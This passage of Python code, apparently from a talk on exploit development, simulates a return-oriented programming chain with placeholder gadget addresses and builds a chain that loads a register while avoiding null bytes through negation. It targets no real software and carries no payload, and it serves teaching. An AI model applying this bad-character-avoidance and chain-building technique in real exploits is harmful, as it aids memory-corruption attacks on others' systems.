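    0x41414110: ("pop", "eax"),          # pop eax ; ret
    0x41414120: ("neg", "eax"),          # neg eax ; ret
    0x41414130: ("xchg", "eax", "ebx"),  # xchg eax, ebx ; ret
}

def run_chain(chain):
    """Simulate the chain: every 'ret' pops the next address off the stack."""
    regs = {"eax": 0, "ebx": 0}
    stack = list(chain)
    while stack:
        op = GADGETS[stack.pop(0)]       # ret fetches the next gadget address
        if op[0] == "pop":
            regs[op[1]] = stack.pop(0)   # pop reg consumes the next dword
        elif op[0] == "neg":
            regs[op[1]] = negate32(regs[op[1]])
        elif op[0] == "xchg":
            regs[op[1]], regs[op[2]] = regs[op[2]], regs[op[1]]
    return regs

def load_ebx_without_nulls(target):
    """Build the talk's chain: pop eax <- -target ; neg eax ; xchg eax, ebx."""
    encoded = negate32(target)
    if bad_chars_in(p32(encoded)):
        # e.g. 0x100 negates to 0xFFFFFF00, which still carries a null byte
        raise ValueError("negated value still contains a bad character")
    chain = [0x41414110, encoded, 0x41414120, 0x41414130]
    return chain, b"".join(p32(x) for x in chain)
```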